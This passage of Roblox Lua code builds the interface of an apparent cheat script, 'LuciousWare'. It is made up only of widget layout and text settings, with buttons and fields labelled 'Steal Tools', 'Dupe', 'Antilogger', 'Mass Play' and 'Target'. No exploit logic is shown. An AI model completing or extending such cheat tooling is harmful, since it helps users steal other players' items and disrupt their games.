TextLabel_3.BackgroundTransparency = 1.000 TextLabel_3.Position = UDim2.new(0.0470351353, 0, 0.0556399897, 0) TextLabel_3.Size = UDim2.new(0, 314, 0, 40) TextLabel_3.Font = Enum.Font.GothamBlack TextLabel_3.Text = "| WELCOME TO LUCIOUSWARE!" TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.TextSize = 21.000 TextLabel_4.Parent = Frame1 TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.BackgroundTransparency = 1.000 TextLabel_4.Position = UDim2.new(0.0785319954, 0, 0.12554881, 0) TextLabel_4.Size = UDim2.new(0, 247, 0, 40) TextLabel_4.Font = Enum.Font.Gotham TextLabel_4.Text = "- UI designer : 3JBH" TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.TextSize = 18.000 TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left TextLabel_5.Parent = Frame1 TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.BackgroundTransparency = 1.000 TextLabel_5.Position = UDim2.new(0.0785319954, 0, 0.189378589, 0) TextLabel_5.Size = UDim2.new(0, 261, 0, 40) TextLabel_5.Font = Enum.Font.Gotham TextLabel_5.Text = "- Visualizer : MaybeeeAlexsander" TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.TextSize = 18.000 TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left TextLabel_6.Parent = Frame1 TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.BackgroundTransparency = 1.000 TextLabel_6.Position = UDim2.new(0.0785319954, 0, 0.25016886, 0) TextLabel_6.Size = UDim2.new(0, 261, 0, 40) TextLabel_6.Font = Enum.Font.Gotham TextLabel_6.Text = "- Scripter : matteoonswag" TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.TextSize = 18.000 TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left TextLabel_7.Parent = Frame1 TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_7.BackgroundTransparency = 1.000 TextLabel_7.Position = UDim2.new(0.0455908217, 0, 0.371749371, 0) TextLabel_7.Size = UDim2.new(0, 137, 0, 40) TextLabel_7.Font = Enum.Font.GothamBlack TextLabel_7.Text = "| CHANGELOG" TextLabel_7.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_7.TextSize = 21.000 TextLabel_8.Parent = Frame1 TextLabel_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_8.BackgroundTransparency = 1.000 TextLabel_8.Position = UDim2.new(0.0785319954, 0, 0.43861872, 0) TextLabel_8.Size = UDim2.new(0, 261, 0, 40) TextLabel_8.Font = Enum.Font.Gotham TextLabel_8.Text = "- Official Release" TextLabel_8.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_8.TextSize = 18.000 TextLabel_8.TextXAlignment = Enum.TextXAlignment.Left TextLabel_9.Parent = Frame1 TextLabel_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_9.BackgroundTransparency = 1.000 TextLabel_9.Position = UDim2.new(0.0785319954, 0, 0.493329972, 0) TextLabel_9.Size = UDim2.new(0, 261, 0, 40) TextLabel_9.Font = Enum.Font.Gotham TextLabel_9.Text = "- More Presets" TextLabel_9.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_9.TextSize = 18.000 TextLabel_9.TextXAlignment = Enum.TextXAlignment.Left TextLabel_10.Parent = Frame1 TextLabel_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_10.BackgroundTransparency = 1.000 TextLabel_10.Position = UDim2.new(0.0455908217, 0, 0.614910483, 0) TextLabel_10.Size = UDim2.new(0, 106, 0, 40) TextLabel_10.Font = Enum.Font.GothamBlack TextLabel_10.Text = "| SUPPORT" TextLabel_10.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_10.TextSize = 21.000 ImageLabel.Parent = Frame1 ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.Position = UDim2.new(0.0776470602, 0, 0.735562325, 0) ImageLabel.Size = UDim2.new(0, 32, 0, 27) ImageLabel.Image = "rbxassetid://7072717605" TextLabel_11.Parent = Frame1 TextLabel_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_11.BackgroundTransparency = 1.000 TextLabel_11.Position = UDim2.new(0.170296699, 0, 0.715214491, 0) TextLabel_11.Size = UDim2.new(0, 261, 0, 40) TextLabel_11.Font = Enum.Font.Gotham TextLabel_11.Text = "discord.gg/5Yx4jaSBPX" TextLabel_11.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_11.TextSize = 18.000 TextLabel_11.TextXAlignment = Enum.TextXAlignment.Left Frame2.Name = "Frame2" Frame2.Parent = Frames Frame2.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Frame2.Position = UDim2.new(0.00100000005, 0, -1, 0) Frame2.Size = UDim2.new(0, 425, 0, 329) Frame2.Visible = false AudioId.Name = "AudioId" AudioId.Parent = Frame2 AudioId.AnchorPoint = Vector2.new(0.5, 0.5) AudioId.BackgroundColor3 = Color3.fromRGB(67, 75, 135) AudioId.BorderColor3 = Color3.fromRGB(44, 44, 44) AudioId.Position = UDim2.new(0.499430448, 0, 0.0669634491, 0) AudioId.Size = UDim2.new(0, 141, 0, 26) AudioId.Font = Enum.Font.Gotham AudioId.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) AudioId.PlaceholderText = "Audio ID" AudioId.Text = "" AudioId.TextColor3 = Color3.fromRGB(255, 255, 255) AudioId.TextSize = 14.000 UICorner_6.Parent = AudioId UICorner_7.Parent = Frame2 Distance.Name = "Distance" Distance.Parent = Frame2 Distance.BackgroundColor3 = Color3.fromRGB(67, 75, 135) Distance.BorderColor3 = Color3.fromRGB(54, 54, 54) Distance.Position = UDim2.new(0.0341802612, 0, 0.71942538, 0) Distance.Size = UDim2.new(0, 80, 0, 27) Distance.ClearTextOnFocus = false Distance.Font = Enum.Font.Gotham Distance.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Distance.PlaceholderText = "Distance" Distance.Text = "" Distance.TextColor3 = Color3.fromRGB(255, 255, 255) Distance.TextSize = 14.000 UICorner_8.Parent = Distance Visualizee.Name = "Visualizee" Visualizee.Parent = Frame2 Visualizee.BackgroundColor3 = Color3.fromRGB(85, 125, 255) Visualizee.BorderColor3 = Color3.fromRGB(54, 54, 54) Visualizee.Position = UDim2.new(0.656413078, 0, 0.144350573, 0) Visualizee.Size = UDim2.new(0, 80, 0, 27) Visualizee.Font = Enum.Font.Gotham Visualizee.Text = "Visualize" Visualizee.TextColor3 = Color3.fromRGB(0, 0, 0) Visualizee.TextSize = 14.000 UICorner_9.Parent = Visualizee Sync.Name = "Sync" Sync.Parent = Frame2 Sync.BackgroundColor3 = Color3.fromRGB(85, 125, 255) Sync.BorderColor3 = Color3.fromRGB(54, 54, 54) Sync.Position = UDim2.new(0.175524637, 0, 0.144959375, 0) Sync.Size = UDim2.new(0, 80, 0, 27) Sync.Font = Enum.Font.Gotham Sync.Text = "Sync" Sync.TextColor3 = Color3.fromRGB(0, 0, 0) Sync.TextSize = 14.000 UICorner_10.Parent = Sync TpInput.Name = "TpInput " TpInput.Parent = Frame2 TpInput.BackgroundColor3 = Color3.fromRGB(67, 75, 135) TpInput.BorderColor3 = Color3.fromRGB(44, 44, 44) TpInput.Position = UDim2.new(0.769522488, 0, 0.0270796288, 0) TpInput.Size = UDim2.new(0, 80, 0, 27) TpInput.Font = Enum.Font.Gotham TpInput.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) TpInput.PlaceholderText = "Time Pos" TpInput.Text = "" TpInput.TextColor3 = Color3.fromRGB(255, 255, 255) TpInput.TextSize = 14.000 TpInput.TextStrokeColor3 = Color3.fromRGB(50, 50, 50) UICorner_11.Parent = TpInput WavesOn.Name = "WavesOn" WavesOn.Parent = Frame2 WavesOn.BackgroundColor3 = Color3.fromRGB(90, 90, 90) WavesOn.Position = UDim2.new(0.652968109, 0, 0.766180336, 0) WavesOn.Size = UDim2.new(0, 16, 0, 16) WavesOn.Font = Enum.Font.Code WavesOn.Text = "" WavesOn.TextColor3 = Color3.fromRGB(53, 53, 53) WavesOn.TextSize = 14.000 UICorner_12.CornerRadius = UDim.new(0, 3) UICorner_12.Parent = WavesOn TextLabel_12.Parent = Frame2 TextLabel_12.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_12.BackgroundTransparency = 1.000 TextLabel_12.Position = UDim2.new(0.516457617, 0, 0.752297342, 0) TextLabel_12.Size = UDim2.new(0, 46, 0, 20) TextLabel_12.Font = Enum.Font.Code TextLabel_12.Text = "Waves" TextLabel_12.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_12.TextSize = 18.000 PresetScroll.Name = "PresetScroll" PresetScroll.Parent = Frame2 PresetScroll.Active = true PresetScroll.BackgroundColor3 = Color3.fromRGB(37, 41, 74) PresetScroll.BorderColor3 = Color3.fromRGB(37, 41, 74) PresetScroll.Position = UDim2.new(0.048411794, 0, 0.337470919, 0) PresetScroll.Size = UDim2.new(0, 119, 0, 105) PresetScroll.BottomImage = "" PresetScroll.MidImage = "" PresetScroll.TopImage = "" MA8.Name = "MA8" MA8.Parent = PresetScroll MA8.AnchorPoint = Vector2.new(0.5, 0.5) MA8.BackgroundColor3 = Color3.fromRGB(85, 125, 255) MA8.Position = UDim2.new(0.449556768, 0, 0.164005235, 0) MA8.Size = UDim2.new(0, 95, 0, 24) MA8.Font = Enum.Font.Gotham MA8.Text = "Infinity" MA8.TextColor3 = Color3.fromRGB(0, 0, 0) MA8.TextScaled = true MA8.TextSize = 14.000 MA8.TextWrapped = true UICorner_13.CornerRadius = UDim.new(0, 3) UICorner_13.Parent = MA8 MAZ.Name = "MAZ" MAZ.Parent = PresetScroll MAZ.AnchorPoint = Vector2.new(0.5, 0) MAZ.BackgroundColor3 = Color3.fromRGB(85, 125, 2550) MAZ.Position = UDim2.new(0.449579835, 0, 0.0987841934, 0) MAZ.Size = UDim2.new(0, 95, 0, 24) MAZ.Font = Enum.Font.Gotham MAZ.Text = "Circle 3" MAZ.TextColor3 = Color3.fromRGB(0, 0, 0) MAZ.TextScaled = true MAZ.TextSize = 14.000 MAZ.TextWrapped = true UICorner_14.CornerRadius = UDim.new(0, 3) UICorner_14.Parent = MAZ MAX.Name = "MAX" MAX.Parent = PresetScroll MAX.BackgroundColor3 = Color3.fromRGB(85, 125, 255) MAX.Position = UDim2.new(0.0504201725, 0, 0.0115907118, 0) MAX.Size = UDim2.new(0, 95, 0, 24) MAX.Font = Enum.Font.Gotham MAX.Text = "Circle 1" MAX.TextColor3 = Color3.fromRGB(0, 0, 0) MAX.TextScaled = true MAX.TextSize = 14.000 MAX.TextWrapped = true UICorner_15.CornerRadius = UDim.new(0, 3) UICorner_15.Parent = MAX MAY.Name = "MAY" MAY.Parent = PresetScroll MAY.AnchorPoint = Vector2.new(0.5, 0) MAY.BackgroundColor3 = Color3.fromRGB(85, 125, 255) MAY.Position = UDim2.new(0.449579835, 0, 0.054711245, 0) MAY.Size = UDim2.new(0, 95, 0, 24) MAY.Font = Enum.Font.Gotham MAY.Text = "Circle 2" MAY.TextColor3 = Color3.fromRGB(0, 0, 0) MAY.TextScaled = true MAY.TextSize = 14.000 MAY.TextWrapped = true UICorner_16.CornerRadius = UDim.new(0, 3) UICorner_16.Parent = MAY Anglesscrol.Name = "Anglesscrol" Anglesscrol.Parent = Frame2 Anglesscrol.Active = true Anglesscrol.BackgroundColor3 = Color3.fromRGB(37, 41, 74) Anglesscrol.BorderColor3 = Color3.fromRGB(37, 41, 74) Anglesscrol.Position = UDim2.new(0.676647067, 0, 0.337470889, 0) Anglesscrol.Size = UDim2.new(0, 119, 0, 105) Anglesscrol.BottomImage = "" Anglesscrol.MidImage = "" Anglesscrol.TopImage = "" WAUP.Name = "WAUP" WAUP.Parent = Anglesscrol WAUP.BackgroundColor3 = Color3.fromRGB(85, 125, 255) WAUP.Position = UDim2.new(0.0309668742, 0, 0.0103343632, 0) WAUP.Size = UDim2.new(0, 95, 0, 24) WAUP.Font = Enum.Font.Gotham WAUP.Text = "UP" WAUP.TextColor3 = Color3.fromRGB(0, 0, 0) WAUP.TextScaled = true WAUP.TextSize = 14.000 WAUP.TextWrapped = true UICorner_17.CornerRadius = UDim.new(0, 3) UICorner_17.Parent = WAUP WAX.Name = "WAX" WAX.Parent = Anglesscrol WAX.BackgroundColor3 = Color3.fromRGB(85, 125, 255) WAX.Position = UDim2.new(0.0291565657, 0, 0.0544073135, 0) WAX.Size = UDim2.new(0, 95, 0, 24) WAX.Font = Enum.Font.Gotham WAX.Text = "X" WAX.TextColor3 = Color3.fromRGB(0, 0, 0) WAX.TextScaled = true WAX.TextSize = 14.000 WAX.TextWrapped = true UICorner_18.CornerRadius = UDim.new(0, 3) UICorner_18.Parent = WAX WAZ.Name = "WAZ" WAZ.Parent = Anglesscrol WAZ.BackgroundColor3 = Color3.fromRGB(85, 125, 255) WAZ.Position = UDim2.new(0.0243037343, 0, 0.145592704, 0) WAZ.Size = UDim2.new(0, 95, 0, 24) WAZ.Font = Enum.Font.Gotham WAZ.Text = "Z" WAZ.TextColor3 = Color3.fromRGB(0, 0, 0) WAZ.TextScaled = true WAZ.TextSize = 14.000 WAZ.TextWrapped = true UICorner_19.CornerRadius = UDim.new(0, 3) UICorner_19.Parent = WAZ WAY.Name = "WAY" WAY.Parent = Anglesscrol WAY.BackgroundColor3 = Color3.fromRGB(85, 125, 255) WAY.Position = UDim2.new(0.0267287716, 0, 0.100000001, 0) WAY.Size = UDim2.new(0, 95, 0, 24) WAY.Font = Enum.Font.Gotham WAY.Text = "Y" WAY.TextColor3 = Color3.fromRGB(0, 0, 0) WAY.TextScaled = true WAY.TextSize = 14.000 WAY.TextWrapped = true UICorner_20.CornerRadius = UDim.new(0, 3) UICorner_20.Parent = WAY TextLabel_13.Parent = Frame2 TextLabel_13.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_13.BackgroundTransparency = 1.000 TextLabel_13.Position = UDim2.new(0.655014992, 0, 0.264522552, 0) TextLabel_13.Size = UDim2.new(0, 118, 0, 17) TextLabel_13.Font = Enum.Font.Gotham TextLabel_13.Text = "Angles" TextLabel_13.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_13.TextSize = 18.000 TextLabel_14.Parent = Frame2 TextLabel_14.AnchorPoint = Vector2.new(0.5, 0.5) TextLabel_14.BackgroundColor3 = Color3.fromRGB(85, 85, 255) TextLabel_14.BackgroundTransparency = 1.000 TextLabel_14.Position = UDim2.new(0.172762975, 0, 0.292746007, 0) TextLabel_14.Size = UDim2.new(0, 56, 0, 17) TextLabel_14.Font = Enum.Font.Gotham TextLabel_14.Text = "Presets" TextLabel_14.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_14.TextSize = 20.000 Dupe.Name = "Dupe" Dupe.Parent = Frame2 Dupe.BackgroundColor3 = Color3.fromRGB(85, 125, 255) Dupe.BorderColor3 = Color3.fromRGB(54, 54, 54) Dupe.Position = UDim2.new(0.405219138, 0, 0.526167512, 0) Dupe.Size = UDim2.new(0, 80, 0, 27) Dupe.Font = Enum.Font.Gotham Dupe.Text = "Dupe" Dupe.TextColor3 = Color3.fromRGB(0, 0, 0) Dupe.TextSize = 14.000 UICorner_21.Parent = Dupe WaveCount.Name = "WaveCount" WaveCount.Parent = Frame2 WaveCount.BackgroundColor3 = Color3.fromRGB(67, 75, 135) WaveCount.BorderColor3 = Color3.fromRGB(44, 44, 44) WaveCount.Position = UDim2.new(0.0341802835, 0, 0.862633348, 0) WaveCount.Size = UDim2.new(0, 80, 0, 27) WaveCount.ClearTextOnFocus = false WaveCount.Font = Enum.Font.Gotham WaveCount.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) WaveCount.PlaceholderText = "WaveCount" WaveCount.Text = "100" WaveCount.TextColor3 = Color3.fromRGB(255, 255, 255) WaveCount.TextSize = 14.000 WaveCount.TextWrapped = true UICorner_22.Parent = WaveCount target.Name = "target" target.Parent = Frame2 target.AnchorPoint = Vector2.new(0.5, 0.5) target.BackgroundColor3 = Color3.fromRGB(67, 75, 135) target.BorderColor3 = Color3.fromRGB(54, 54, 54) target.Position = UDim2.new(0.148238674, 0, 0.0684947073, 0) target.Size = UDim2.new(0, 80, 0, 26) target.Font = Enum.Font.Gotham target.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) target.PlaceholderText = "Target" target.Text = "" target.TextColor3 = Color3.fromRGB(255, 255, 255) target.TextSize = 14.000 UICorner_23.Parent = target massplay.Name = "massplay" massplay.Parent = Frame2 massplay.BackgroundColor3 = Color3.fromRGB(85, 125, 255) massplay.BorderColor3 = Color3.fromRGB(54, 54, 54) massplay.Position = UDim2.new(0.417790502, 0, 0.146636739, 0) massplay.Size = UDim2.new(0, 80, 0, 27) massplay.Font = Enum.Font.Gotham massplay.Text = "Mass Play" massplay.TextColor3 = Color3.fromRGB(0, 0, 0) massplay.TextSize = 14.000 UICorner_24.Parent = massplay Responsiveness.Name = "Responsiveness" Responsiveness.Parent = Frame2 Responsiveness.BackgroundColor3 = Color3.fromRGB(67, 75, 135) Responsiveness.BorderColor3 = Color3.fromRGB(44, 44, 44) Responsiveness.Position = UDim2.new(0.257360727, 0, 0.85562551, 0) Responsiveness.Size = UDim2.new(0, 80, 0, 27) Responsiveness.ClearTextOnFocus = false Responsiveness.Font = Enum.Font.Gotham Responsiveness.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Responsiveness.PlaceholderText = "Responsiveness" Responsiveness.Text = "200" Responsiveness.TextColor3 = Color3.fromRGB(255, 255, 255) Responsiveness.TextSize = 14.000 Responsiveness.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) Responsiveness.TextWrapped = true UICorner_25.Parent = Responsiveness WaveInt.Name = "WaveInt" WaveInt.Parent = Frame2 WaveInt.BackgroundColor3 = Color3.fromRGB(67, 75, 135) WaveInt.BorderColor3 = Color3.fromRGB(54, 54, 54) WaveInt.Position = UDim2.new(0.494402707, 0, 0.86204195, 0) WaveInt.Size = UDim2.new(0, 80, 0, 27) WaveInt.ClearTextOnFocus = false WaveInt.Font = Enum.Font.Gotham WaveInt.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) WaveInt.PlaceholderText = "Wave Int" WaveInt.Text = "" WaveInt.TextColor3 = Color3.fromRGB(255, 255, 255) WaveInt.TextSize = 12.000 UICorner_26.Parent = WaveInt Bass.Name = "Bass" Bass.Parent = Frame2 Bass.BackgroundColor3 = Color3.fromRGB(67, 75, 135) Bass.BorderColor3 = Color3.fromRGB(44, 44, 44) Bass.Position = UDim2.new(0.725219131, 0, 0.859780669, 0) Bass.Size = UDim2.new(0, 80, 0, 27) Bass.ClearTextOnFocus = false Bass.Font = Enum.Font.Gotham Bass.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Bass.PlaceholderText = "Bass Int" Bass.Text = "100" Bass.TextColor3 = Color3.fromRGB(255, 255, 255) Bass.TextSize = 14.000 Bass.TextWrapped = true UICorner_27.Parent = Bass Speed.Name = "Speed" Speed.Parent = Frame2 Speed.BackgroundColor3 = Color3.fromRGB(67, 75, 135) Speed.BorderColor3 = Color3.fromRGB(54, 54, 54) Speed.Position = UDim2.new(0.257288277, 0, 0.71942538, 0) Speed.Size = UDim2.new(0, 80, 0, 27) Speed.ClearTextOnFocus = false Speed.Font = Enum.Font.Gotham Speed.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Speed.PlaceholderText = "Speed" Speed.Text = "" Speed.TextColor3 = Color3.fromRGB(255, 255, 255) Speed.TextSize = 14.000 UICorner_28.Parent = Speed Amount.Name = "Amount" Amount.Parent = Frame2 Amount.BackgroundColor3 = Color3.fromRGB(67, 75, 135) Amount.BorderColor3 = Color3.fromRGB(54, 54, 54) Amount.Position = UDim2.new(0.405219138, 0, 0.40635547, 0) Amount.Size = UDim2.new(0, 80, 0, 27) Amount.Font = Enum.Font.Code Amount.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Amount.PlaceholderText = "Dupe Value" Amount.Text = "" Amount.TextColor3 = Color3.fromRGB(255, 255, 255) Amount.TextSize = 14.000 UICorner_29.Parent = Amount LogFrame.Name = "LogFrame" LogFrame.Parent = Frames LogFrame.BackgroundColor3 = Color3.fromRGB(29, 32, 58) LogFrame.BorderSizePixel = 0 LogFrame.Position = UDim2.new(0, 0, -1, 0) LogFrame.Size = UDim2.new(0, 425, 0, 329) AudioLogs.Name = "AudioLogs" AudioLogs.Parent = LogFrame AudioLogs.Active = true AudioLogs.BackgroundColor3 = Color3.fromRGB(29, 32, 58) AudioLogs.BorderSizePixel = 0 AudioLogs.Position = UDim2.new(0.0541176461, 0, 0.0577507615, 0) AudioLogs.Size = UDim2.new(0, 381, 0, 226) AudioLogs.ScrollBarThickness = 0 UICorner_30.CornerRadius = UDim.new(0, 10) UICorner_30.Parent = AudioLogs UIListLayout.Parent = AudioLogs UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout.Padding = UDim.new(0, -6) Layout.Name = "Layout" Layout.Parent = LogFrame Layout.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Layout.BackgroundTransparency = 1.000 Layout.Position = UDim2.new(0.0213674754, 0, 0.782169044, 0) Layout.Size = UDim2.new(0, 409, 0, 44) WorkspaceL.Name = "WorkspaceL" WorkspaceL.Parent = Layout WorkspaceL.BackgroundColor3 = Color3.fromRGB(60, 67, 121) WorkspaceL.Position = UDim2.new(0.0299346764, 0, 0.25, 0) WorkspaceL.Size = UDim2.new(0, 90, 0, 37) WorkspaceL.Font = Enum.Font.SourceSansSemibold WorkspaceL.Text = "Workspace Log" WorkspaceL.TextColor3 = Color3.fromRGB(255, 255, 255) WorkspaceL.TextSize = 15.000 Corner_2.CornerRadius = UDim.new(0, 10) Corner_2.Name = "Corner" Corner_2.Parent = WorkspaceL GameL.Name = "GameL" GameL.Parent = Layout GameL.BackgroundColor3 = Color3.fromRGB(60, 67, 121) GameL.Position = UDim2.new(0.276616067, 0, 0.263225853, 0) GameL.Size = UDim2.new(0, 85, 0, 37) GameL.Font = Enum.Font.SourceSansSemibold GameL.Text = "Game Log" GameL.TextColor3 = Color3.fromRGB(255, 255, 255) GameL.TextSize = 16.000 Corner_3.CornerRadius = UDim.new(0, 10) Corner_3.Name = "Corner" Corner_3.Parent = GameL Copy.Name = "Copy" Copy.Parent = Layout Copy.AnchorPoint = Vector2.new(0.5, 0.5) Copy.BackgroundColor3 = Color3.fromRGB(60, 67, 121) Copy.Position = UDim2.new(0.619464338, 0, 0.659090877, 0) Copy.Size = UDim2.new(0, 85, 0, 37) Copy.Font = Enum.Font.SourceSansSemibold Copy.Text = "Copy ID" Copy.TextColor3 = Color3.fromRGB(255, 255, 255) Copy.TextSize = 16.000 Corner_4.CornerRadius = UDim.new(0, 10) Corner_4.Name = "Corner" Corner_4.Parent = Copy Play.Name = "Play" Play.Parent = Layout Play.BackgroundColor3 = Color3.fromRGB(60, 67, 121) Play.Position = UDim2.new(0.753151417, 0, 0.263225824, 0) Play.Size = UDim2.new(0, 85, 0, 37) Play.Font = Enum.Font.SourceSansSemibold Play.Text = "Play Audio" Play.TextColor3 = Color3.fromRGB(255, 255, 255) Play.TextSize = 16.000 Corner_5.CornerRadius = UDim.new(0, 10) Corner_5.Name = "Corner" Corner_5.Parent = Play Holder.Name = "Holder" Holder.Parent = LogFrame Holder.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Holder.BackgroundTransparency = 1.000 Holder.Position = UDim2.new(0.0243982654, 0, 0, 0) Holder.Size = UDim2.new(0, 166, 0, 57) Holder.Visible = false AudioFrame.Name = "AudioFrame" AudioFrame.Parent = Holder AudioFrame.BackgroundColor3 = Color3.fromRGB(56, 63, 113) AudioFrame.Position = UDim2.new(0.181153834, 0, 0.238760829, 0) AudioFrame.Size = UDim2.new(0, 343, 0, 43) Corner_6.CornerRadius = UDim.new(0, 6) Corner_6.Name = "Corner" Corner_6.Parent = AudioFrame AudioID.Name = "AudioID" AudioID.Parent = AudioFrame AudioID.BackgroundColor3 = Color3.fromRGB(255, 255, 255) AudioID.BackgroundTransparency = 1.000 AudioID.Position = UDim2.new(0.0225827415, 0, 0.522650778, 0) AudioID.Size = UDim2.new(0, 233, 0, 16) AudioID.Font = Enum.Font.SourceSansSemibold AudioID.Text = "Audio.ID" AudioID.TextColor3 = Color3.fromRGB(163, 163, 163) AudioID.TextSize = 16.000 AudioID.TextWrapped = true AudioID.TextXAlignment = Enum.TextXAlignment.Left AudioName.Name = "AudioName" AudioName.Parent = AudioFrame AudioName.BackgroundColor3 = Color3.fromRGB(255, 255, 255) AudioName.BackgroundTransparency = 1.000 AudioName.Position = UDim2.new(0.0222222209, 0, 0.136511639, 0) AudioName.Size = UDim2.new(0, 234, 0, 16) AudioName.Font = Enum.Font.SourceSansSemibold AudioName.Text = "Audio.Name" AudioName.TextColor3 = Color3.fromRGB(235, 235, 235) AudioName.TextSize = 18.000 AudioName.TextXAlignment = Enum.TextXAlignment.Left Select.Name = "Select" Select.Parent = AudioFrame Select.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Select.Position = UDim2.new(0.726338148, 0, 0.156744197, 0) Select.Size = UDim2.new(0, 79, 0, 29) Select.Font = Enum.Font.SourceSansSemibold Select.Text = "Select" Select.TextColor3 = Color3.fromRGB(255, 255, 255) Select.TextSize = 16.000 Corner_7.CornerRadius = UDim.new(0, 6) Corner_7.Name = "Corner" Corner_7.Parent = Select UICorner_31.Parent = LogFrame Frame3.Name = "Frame3" Frame3.Parent = Frames Frame3.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Frame3.Position = UDim2.new(0, 0, -1, 0) Frame3.Size = UDim2.new(0, 425, 0, 329) StealTools.Name = "StealTools" StealTools.Parent = Frame3 StealTools.BackgroundColor3 = Color3.fromRGB(62, 69, 124) StealTools.Position = UDim2.new(0.55759275, 0, 0.413930893, 0) StealTools.Size = UDim2.new(0, 134, 0, 29) UICorner_32.Parent = StealTools TextBox.Name = "TextBox" TextBox.Parent = StealTools TextBox.AnchorPoint = Vector2.new(0.5, 0.5) TextBox.BackgroundColor3 = Color3.fromRGB(45, 50, 90) TextBox.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox.Position = UDim2.new(0.825047731, 0, 0.5, 0) TextBox.Size = UDim2.new(0, 22, 0, 20) TextBox.Font = Enum.Font.Code TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(255, 0, 0) TextBox.TextSize = 14.000 UICorner_33.Parent = TextBox TextLabel_15.Parent = StealTools TextLabel_15.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_15.BackgroundTransparency = 1.000 TextLabel_15.Position = UDim2.new(-0.00369450822, 0, -0.0282848738, 0) TextLabel_15.Size = UDim2.new(0, 90, 0, 30) TextLabel_15.ZIndex = 0 TextLabel_15.Font = Enum.Font.Gotham TextLabel_15.Text = "Steal Tools" TextLabel_15.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_15.TextSize = 14.000 Antilog.Name = "Antilog" Antilog.Parent = Frame3 Antilog.BackgroundColor3 = Color3.fromRGB(62, 69, 124) Antilog.BorderColor3 = Color3.fromRGB(44, 44, 44) Antilog.Position = UDim2.new(0.517510772, 0, 0.207777128, 0) Antilog.Size = UDim2.new(0, 174, 0, 28) Antilog.Font = Enum.Font.Gotham Antilog.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Antilog.PlaceholderText = "Antilogger" Antilog.Text = "" Antilog.TextColor3 = Color3.fromRGB(255, 255, 255) Antilog.TextSize = 14.000 UICorner_34.CornerRadius = UDim.new(0, 10) UICorner_34.Parent = Antilog TextLabel_16.Parent = Frame3 TextLabel_16.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_16.BackgroundTransparency = 1.000 TextLabel_16.Position = UDim2.new(0.449287981, 0, 0.0938312486, 0) TextLabel_16.Size = UDim2.new(0, 227, 0, 38) TextLabel_16.Font = Enum.Font.Gotham TextLabel_16.Text = "Put ID in text box and press enter" TextLabel_16.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_16.TextSize = 13.000 UICorner_35.Parent = Frame3 CmdBar.Name = "CmdBar" CmdBar.Parent = Frame3 CmdBar.BackgroundColor3 = Color3.fromRGB(67, 75, 135) CmdBar.Position = UDim2.new(0.0478222668, 0, 0.780969501, 0) CmdBar.Size = UDim2.new(0, 146, 0, 24) CmdBar.Font = Enum.Font.SourceSansSemibold CmdBar.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) CmdBar.PlaceholderText = "Command Input" CmdBar.Text = "" CmdBar.TextColor3 = Color3.fromRGB(255, 255, 255) CmdBar.TextSize = 16.000 Corner_8.CornerRadius = UDim.new(0, 10) Corner_8.Name = "Corner" Corner_8.Parent = CmdBar CommandsFrame.Name = "CommandsFrame" CommandsFrame.Parent = Frame3 CommandsFrame.BackgroundColor3 = Color3.fromRGB(54, 60, 109) CommandsFrame.ClipsDescendants = true CommandsFrame.Position = UDim2.new(0.0478222668, 0, 0.151975691, 0) CommandsFrame.Size = UDim2.new(0, 148, 0, 184) UICorner_36.Parent = CommandsFrame TextLabel_17.Parent = CommandsFrame TextLabel_17.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_17.BackgroundTransparency = 1.000 TextLabel_17.Position = UDim2.new(0, 0, -0.048913043, 0) TextLabel_17.Size = UDim2.new(0, 147, 0, 34) TextLabel_17.ZIndex = 0 